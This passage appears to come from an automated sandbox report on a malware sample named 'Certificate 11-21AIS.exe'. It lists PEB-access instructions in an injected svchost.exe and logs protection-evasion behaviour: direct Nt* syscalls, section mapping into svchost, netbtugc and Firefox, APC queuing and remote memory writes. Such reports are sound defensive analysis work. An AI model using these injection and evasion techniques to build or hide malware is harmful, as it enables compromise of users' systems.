            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03728B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008FA66C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E8189 SetUnhandledExceptionFilter,0_2_008E8189
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008E81AC

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtClose: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 5304
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CCE008
